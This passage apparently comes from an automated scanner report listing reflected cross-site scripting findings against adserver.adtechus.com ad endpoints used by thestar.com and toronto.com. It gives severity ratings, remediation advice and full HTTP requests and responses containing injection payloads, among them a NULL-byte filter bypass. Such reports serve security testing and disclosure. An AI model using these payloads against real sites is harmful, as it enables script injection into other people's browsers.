Server: Adtech Adserver
Cache-Control: no-cache
P3P: CP="NOI DSP DEVa OUR BUS UNI COM NAV INT"
Content-Type: application/x-javascript
Set-Cookie: 1=AE775A24.128B36.4.DD494.51.0.4CE93806.D5E75.8E869E.145E.1;expires=Sun, 28 Nov 2010 15:17:26 GMT;domain=adserver.adtechus.com;path=/
Content-Length: 19023

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
ashClick || AT_MICROSITE!="")
{    AT_COUNT=''
if ('906388'!='_ADFC'+'_CUID_') AT_COUNT=escape('http://adserver.adtechus.com/adlink/5214/906388/0/225/AdId=1215286;BnId=4;itime=352645191;nodecode=yes;link=4bb7a'-alert(1)-'fda509b19b0')
AT_VARSTRING="?cli"+"ckTAG=javascript:void(win"+"dow.open('"+AT_COUNT+AT_CLICK+"','','"+AT_MICROSITE906388+"'))";
AT_TARGET906388="_self";
}
window.AT_ClickFn906388= function (click)
{    click=(isNaN(
...[SNIP]...

2.96. http://adserver.adtechus.com/addyn/3.0/5214.1/906388/0/-1/ADTECH [loc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5214.1/906388/0/-1/ADTECH

Issue detail

The value of the loc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4b664"-alert(1)-"676d698933f was submitted in the loc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn/3.0/5214.1/906388/0/-1/ADTECH;loc=100;target=_blank;alias=thestar_searchresults_hub_728x90_1;size=728x90;key=;grp=124;misc=1290352490578;aduho=-360;rdclick=4b664"-alert(1)-"676d698933f HTTP/1.1
Accept: */*
Referer: http://www.thestar.com/searchresults?AssetType=article&stype=genSearch&q=%3E%3E&r=all:1
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: adserver.adtechus.com
Proxy-Connection: Keep-Alive
Cookie: CfP=1; JEB2=4CE6E57B6E651A454F57E65AF000985E; 1=AE775A24.133AFE.1.114457.50.0.4CE93776.D5E75.8E869E.145E.1

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
P3P: CP="NOI DSP DEVa OUR BUS UNI COM NAV INT"
Content-Type: application/x-javascript
Set-Cookie: 1=AE775A24.128B36.4.DD494.51.0.4CE93801.D5E75.8E869E.145E.1;expires=Sun, 28 Nov 2010 15:17:21 GMT;domain=adserver.adtechus.com;path=/
Content-Length: 19023

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
CLICKVAR[0]?AT_CLICKVAR[0]:"clickTAG";
var AT_MULTICLICKSTR="?"+AT_CLICKVAR[0]+"=" + escape("http://adserver.adtechus.com/adlink/5214/906388/0/225/AdId=1215286;BnId=4;itime=352640837;nodecode=yes;link=4b664"-alert(1)-"676d698933f") + escape(AT_CLICK);
var AT_FLASHVARSSTR= "";
// if use microsite, dont add the first parameter
if (AT_MICROSITE=="") AT_FLASHVARSSTR = AT_CLICKVAR[0]+"=" + escape("http://adserver.adtechus.com/adlin
...[SNIP]...

2.97. http://adserver.adtechus.com/addyn/3.0/5214.1/906388/0/-1/ADTECH [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5214.1/906388/0/-1/ADTECH

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6dc27'-alert(1)-'ae52f954438 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn/3.0/5214.1/906388/0/-1/ADTECH;loc=100;target=_blank;alias=thestar_searchresults_hub_728x90_1;size=728x90;key=;grp=124;misc=1290352490578;aduho=-360;rdclick=&6dc27'-alert(1)-'ae52f954438=1 HTTP/1.1
Accept: */*
Referer: http://www.thestar.com/searchresults?AssetType=article&stype=genSearch&q=%3E%3E&r=all:1
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: adserver.adtechus.com
Proxy-Connection: Keep-Alive
Cookie: CfP=1; JEB2=4CE6E57B6E651A454F57E65AF000985E; 1=AE775A24.133AFE.1.114457.50.0.4CE93776.D5E75.8E869E.145E.1

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
P3P: CP="NOI DSP DEVa OUR BUS UNI COM NAV INT"
Content-Type: application/x-javascript
Set-Cookie: 1=AE775A24.128B36.6.DD494.51.0.4CE9380D.D5E75.8E869E.145E.1;expires=Sun, 28 Nov 2010 15:17:33 GMT;domain=adserver.adtechus.com;path=/
Content-Length: 19057

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
shClick || AT_MICROSITE!="")
{    AT_COUNT=''
if ('906388'!='_ADFC'+'_CUID_') AT_COUNT=escape('http://adserver.adtechus.com/adlink/5214/906388/0/225/AdId=1215286;BnId=6;itime=352652558;nodecode=yes;link=&6dc27'-alert(1)-'ae52f954438=1')
AT_VARSTRING="?cli"+"ckTAG=javascript:void(win"+"dow.open('"+AT_COUNT+AT_CLICK+"','','"+AT_MICROSITE906388+"'))";
AT_TARGET906388="_self";
}
window.AT_ClickFn906388= function (click)
{    click=(isNa
...[SNIP]...

2.98. http://adserver.adtechus.com/addyn/3.0/5214.1/906388/0/-1/ADTECH [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5214.1/906388/0/-1/ADTECH

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 74b62"-alert(1)-"160f91b1af0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn/3.0/5214.1/906388/0/-1/ADTECH;loc=100;target=_blank;alias=thestar_searchresults_hub_728x90_1;size=728x90;key=;grp=124;misc=1290352490578;aduho=-360;rdclick=&74b62"-alert(1)-"160f91b1af0=1 HTTP/1.1
Accept: */*
Referer: http://www.thestar.com/searchresults?AssetType=article&stype=genSearch&q=%3E%3E&r=all:1
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: adserver.adtechus.com
Proxy-Connection: Keep-Alive
Cookie: CfP=1; JEB2=4CE6E57B6E651A454F57E65AF000985E; 1=AE775A24.133AFE.1.114457.50.0.4CE93776.D5E75.8E869E.145E.1

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
P3P: CP="NOI DSP DEVa OUR BUS UNI COM NAV INT"
Content-Type: application/x-javascript
Set-Cookie: 1=AE775A24.128B36.A.DD494.51.0.4CE9380A.D5E75.8E869E.145E.1;expires=Sun, 28 Nov 2010 15:17:30 GMT;domain=adserver.adtechus.com;path=/
Content-Length: 19065

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
ICKVAR[0]?AT_CLICKVAR[0]:"clickTAG";
var AT_MULTICLICKSTR="?"+AT_CLICKVAR[0]+"=" + escape("http://adserver.adtechus.com/adlink/5214/906388/0/225/AdId=1215286;BnId=10;itime=352649524;nodecode=yes;link=&74b62"-alert(1)-"160f91b1af0=1") + escape(AT_CLICK);
var AT_FLASHVARSSTR= "";
// if use microsite, dont add the first parameter
if (AT_MICROSITE=="") AT_FLASHVARSSTR = AT_CLICKVAR[0]+"=" + escape("http://adserver.adtechus.com/adl
...[SNIP]...

2.99. http://adserver.adtechus.com/addyn/3.0/5214.1/906389/0/-1/ADTECH [loc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5214.1/906389/0/-1/ADTECH

Issue detail

The value of the loc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 31f3a'-alert(1)-'eea6890dad0 was submitted in the loc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn/3.0/5214.1/906389/0/-1/ADTECH;loc=100;target=_blank;alias=thestar_searchresults_hub_300x250_1;size=300x250;key=;grp=124;misc=1290352493311;aduho=-360;rdclick=31f3a'-alert(1)-'eea6890dad0 HTTP/1.1
Accept: */*
Referer: http://www.thestar.com/searchresults?AssetType=article&stype=genSearch&q=%3E%3E&r=all:1
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: adserver.adtechus.com
Proxy-Connection: Keep-Alive
Cookie: CfP=1; JEB2=4CE6E57B6E651A454F57E65AF000985E; 1=AE775A24.128B36.2.DD494.51.0.4CE937E1.D5E75.8E869E.145E.1

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
P3P: CP="NOI DSP DEVa OUR BUS UNI COM NAV INT"
Content-Type: application/x-javascript
Set-Cookie: 1=AE775A24.128B36.3.DD495.52.0.4CE93804.D5E75.8E869E.145E.1;expires=Sun, 28 Nov 2010 15:17:24 GMT;domain=adserver.adtechus.com;path=/
Content-Length: 19028

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
ashClick || AT_MICROSITE!="")
{    AT_COUNT=''
if ('906389'!='_ADFC'+'_CUID_') AT_COUNT=escape('http://adserver.adtechus.com/adlink/5214/906389/0/170/AdId=1215286;BnId=3;itime=352643759;nodecode=yes;link=31f3a'-alert(1)-'eea6890dad0')
AT_VARSTRING="?cli"+"ckTAG=javascript:void(win"+"dow.open('"+AT_COUNT+AT_CLICK+"','','"+AT_MICROSITE906389+"'))";
AT_TARGET906389="_self";
}
window.AT_ClickFn906389= function (click)
{    click=(isNaN(
...[SNIP]...

2.100. http://adserver.adtechus.com/addyn/3.0/5214.1/906389/0/-1/ADTECH [loc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5214.1/906389/0/-1/ADTECH

Issue detail

The value of the loc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e0ee5"-alert(1)-"4381c289514 was submitted in the loc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn/3.0/5214.1/906389/0/-1/ADTECH;loc=100;target=_blank;alias=thestar_searchresults_hub_300x250_1;size=300x250;key=;grp=124;misc=1290352493311;aduho=-360;rdclick=e0ee5"-alert(1)-"4381c289514 HTTP/1.1
Accept: */*
Referer: http://www.thestar.com/searchresults?AssetType=article&stype=genSearch&q=%3E%3E&r=all:1
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: adserver.adtechus.com
Proxy-Connection: Keep-Alive
Cookie: CfP=1; JEB2=4CE6E57B6E651A454F57E65AF000985E; 1=AE775A24.128B36.2.DD494.51.0.4CE937E1.D5E75.8E869E.145E.1

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
P3P: CP="NOI DSP DEVa OUR BUS UNI COM NAV INT"
Content-Type: application/x-javascript
Set-Cookie: 1=AE775A24.128B36.9.DD495.52.0.4CE93801.D5E75.8E869E.145E.1;expires=Sun, 28 Nov 2010 15:17:21 GMT;domain=adserver.adtechus.com;path=/
Content-Length: 19030

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
CLICKVAR[0]?AT_CLICKVAR[0]:"clickTAG";
var AT_MULTICLICKSTR="?"+AT_CLICKVAR[0]+"=" + escape("http://adserver.adtechus.com/adlink/5214/906389/0/170/AdId=1215286;BnId=9;itime=352640841;nodecode=yes;link=e0ee5"-alert(1)-"4381c289514") + escape(AT_CLICK);
var AT_FLASHVARSSTR= "";
// if use microsite, dont add the first parameter
if (AT_MICROSITE=="") AT_FLASHVARSSTR = AT_CLICKVAR[0]+"=" + escape("http://adserver.adtechus.com/adlin
...[SNIP]...

2.101. http://adserver.adtechus.com/addyn/3.0/5214.1/906389/0/-1/ADTECH [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5214.1/906389/0/-1/ADTECH

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a7fb6"-alert(1)-"4d05cc0dc37 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn/3.0/5214.1/906389/0/-1/ADTECH;loc=100;target=_blank;alias=thestar_searchresults_hub_300x250_1;size=300x250;key=;grp=124;misc=1290352493311;aduho=-360;rdclick=&a7fb6"-alert(1)-"4d05cc0dc37=1 HTTP/1.1
Accept: */*
Referer: http://www.thestar.com/searchresults?AssetType=article&stype=genSearch&q=%3E%3E&r=all:1
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: adserver.adtechus.com
Proxy-Connection: Keep-Alive
Cookie: CfP=1; JEB2=4CE6E57B6E651A454F57E65AF000985E; 1=AE775A24.128B36.2.DD494.51.0.4CE937E1.D5E75.8E869E.145E.1

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
P3P: CP="NOI DSP DEVa OUR BUS UNI COM NAV INT"
Content-Type: application/x-javascript
Set-Cookie: 1=AE775A24.128B36.5.DD495.52.0.4CE93806.D5E75.8E869E.145E.1;expires=Sun, 28 Nov 2010 15:17:26 GMT;domain=adserver.adtechus.com;path=/
Content-Length: 19062

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
LICKVAR[0]?AT_CLICKVAR[0]:"clickTAG";
var AT_MULTICLICKSTR="?"+AT_CLICKVAR[0]+"=" + escape("http://adserver.adtechus.com/adlink/5214/906389/0/170/AdId=1215286;BnId=5;itime=352645188;nodecode=yes;link=&a7fb6"-alert(1)-"4d05cc0dc37=1") + escape(AT_CLICK);
var AT_FLASHVARSSTR= "";
// if use microsite, dont add the first parameter
if (AT_MICROSITE=="") AT_FLASHVARSSTR = AT_CLICKVAR[0]+"=" + escape("http://adserver.adtechus.com/adl
...[SNIP]...

2.102. http://adserver.adtechus.com/addyn/3.0/5214.1/906389/0/-1/ADTECH [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5214.1/906389/0/-1/ADTECH

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 39bc6'-alert(1)-'982ecd8590b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn/3.0/5214.1/906389/0/-1/ADTECH;loc=100;target=_blank;alias=thestar_searchresults_hub_300x250_1;size=300x250;key=;grp=124;misc=1290352493311;aduho=-360;rdclick=&39bc6'-alert(1)-'982ecd8590b=1 HTTP/1.1
Accept: */*
Referer: http://www.thestar.com/searchresults?AssetType=article&stype=genSearch&q=%3E%3E&r=all:1
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: adserver.adtechus.com
Proxy-Connection: Keep-Alive
Cookie: CfP=1; JEB2=4CE6E57B6E651A454F57E65AF000985E; 1=AE775A24.128B36.2.DD494.51.0.4CE937E1.D5E75.8E869E.145E.1

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
P3P: CP="NOI DSP DEVa OUR BUS UNI COM NAV INT"
Content-Type: application/x-javascript
Set-Cookie: 1=AE775A24.128B36.1.DD495.52.0.4CE93809.D5E75.8E869E.145E.1;expires=Sun, 28 Nov 2010 15:17:29 GMT;domain=adserver.adtechus.com;path=/
Content-Length: 19057

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
shClick || AT_MICROSITE!="")
{    AT_COUNT=''
if ('906389'!='_ADFC'+'_CUID_') AT_COUNT=escape('http://adserver.adtechus.com/adlink/5214/906389/0/170/AdId=1215286;BnId=1;itime=352648984;nodecode=yes;link=&39bc6'-alert(1)-'982ecd8590b=1')
AT_VARSTRING="?cli"+"ckTAG=javascript:void(win"+"dow.open('"+AT_COUNT+AT_CLICK+"','','"+AT_MICROSITE906389+"'))";
AT_TARGET906389="_self";
}
window.AT_ClickFn906389= function (click)
{    click=(isNa
...[SNIP]...

2.103. http://adserver.adtechus.com/addyn/3.0/5214.1/965516/0/-1/ADTECH [loc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5214.1/965516/0/-1/ADTECH

Issue detail

The value of the loc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %00d4d30"-alert(1)-"180baf913e4 was submitted in the loc parameter. This input was echoed as d4d30"-alert(1)-"180baf913e4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /addyn/3.0/5214.1/965516/0/-1/ADTECH;loc=100;target=_blank;alias=toronto.com_searchresults_237x90_1;size=237x90;key=%27%27aee2d%3C/title%3E%3Cscript%3Ealert(hoyt%20llc)%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010;grp=346;misc=1290207912904;aduho=-360;rdclick=%00d4d30"-alert(1)-"180baf913e4 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.toronto.com/searchResults?q=''aee2d%3C/title%3E%3Cscript%3Ealert(hoyt%20llc)%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4CD721666E651A444F57E65AF001514E; 1=AE7702EE.133AEA.4.11546B.1.0.4CE702EE.133AE8.8C3D07.145E.1

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 1630

document.write("\n");
var curDateTime = new Date();
var offset = -(curDateTime.getTimezoneOffset());
if (offset > 0)
offset = "+" + offset;
if (window.adgroupid == undefined) {
window.adgroupid = Math
...[SNIP]...
adtechus.com/adlink/5214/965516/0/2666/AdId=1084099;BnId=1;itime=210248276;key=%27%27aee2d%3C/title%3E%3Cscript%3Ealert(hoyt%20llc)%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010;nodecode=yes;link=%00d4d30"-alert(1)-"180baf913e4http://adserver.adtechus.com/adlink/3.0/5294.1/1352306/0/2666/ADTECH;loc=300;key=key1+key2+key3+key4;rdclick=http://adserver.adtechus.com/adlink/5214/965516/0/2666/AdId=1084099;BnId=1;itime=210248276;k
...[SNIP]...

2.104. http://adserver.adtechus.com/addyn/3.0/5214.1/965516/0/-1/ADTECH [loc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5214.1/965516/0/-1/ADTECH

Issue detail

The value of the loc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6fc86'-alert(1)-'0fd1721a4b8 was submitted in the loc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn/3.0/5214.1/965516/0/-1/ADTECH;loc=100;target=_blank;alias=toronto.com_searchresults_237x90_1;size=237x90;key=%27%27aee2d%3C/title%3E%3Cscript%3Ealert(hoyt%20llc)%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010;grp=576;misc=1290207895078;aduho=-360;rdclick=6fc86'-alert(1)-'0fd1721a4b8 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.toronto.com/searchResults?q=''aee2d%3C/title%3E%3Cscript%3Ealert(hoyt%20llc)%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4CD721666E651A444F57E65AF001514E; 1=AE7702EE.133AEA.4.11546B.1.0.4CE702EE.133AE8.8C3D07.145E.1

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 414

document.write('<a href="6fc86'-alert(1)-'0fd1721a4b8http://adserver.adtechus.com/?adlink/5214/965516/0/2666/AdId=503987;BnId=3;itime=210247317;key=%27%27aee2d%3C/title%3E%3Cscript%3Ealert(hoyt%20llc)%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010;" tar
...[SNIP]...

2.105. http://adserver.adtechus.com/addyn/3.0/5214.1/965516/0/-1/ADTECH [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5214.1/965516/0/-1/ADTECH

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 707cb'-alert(1)-'be5fd5752e4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn/3.0/5214.1/965516/0/-1/ADTECH;loc=100;target=_blank;alias=toronto.com_searchresults_237x90_1;size=237x90;key=%27%27aee2d%3C/title%3E%3Cscript%3Ealert(hoyt%20llc)%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010;grp=576;misc=1290207895078;aduho=-360;rdclick=&707cb'-alert(1)-'be5fd5752e4=1 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.toronto.com/searchResults?q=''aee2d%3C/title%3E%3Cscript%3Ealert(hoyt%20llc)%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4CD721666E651A444F57E65AF001514E; 1=AE7702EE.133AEA.4.11546B.1.0.4CE702EE.133AE8.8C3D07.145E.1

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 1630

document.write("\n");
var curDateTime = new Date();
var offset = -(curDateTime.getTimezoneOffset());
if (offset > 0)
offset = "+" + offset;
if (window.adgroupid == undefined) {
window.adgroupid = Math
...[SNIP]...
r.adtechus.com/adlink/5214/965516/0/2666/AdId=1084099;BnId=1;itime=210248425;key=%27%27aee2d%3C/title%3E%3Cscript%3Ealert(hoyt%20llc)%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010;nodecode=yes;link=&707cb'-alert(1)-'be5fd5752e4=1">
...[SNIP]...

2.106. http://adserver.adtechus.com/addyn/3.0/5214.1/965516/0/-1/ADTECH [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5214.1/965516/0/-1/ADTECH

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %003a728"-alert(1)-"666952faf27 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3a728"-alert(1)-"666952faf27 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /addyn/3.0/5214.1/965516/0/-1/ADTECH;loc=100;target=_blank;alias=toronto.com_searchresults_237x90_1;size=237x90;key=%27%27aee2d%3C/title%3E%3Cscript%3Ealert(1)%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010;grp=854;misc=1290207883925;aduho=-360;rdclick=&%003a728"-alert(1)-"666952faf27=1 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.toronto.com/searchResults?q=%27%27aee2d%3C/title%3E%3Cscript%3Ealert%281%29%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010
Accept: */*
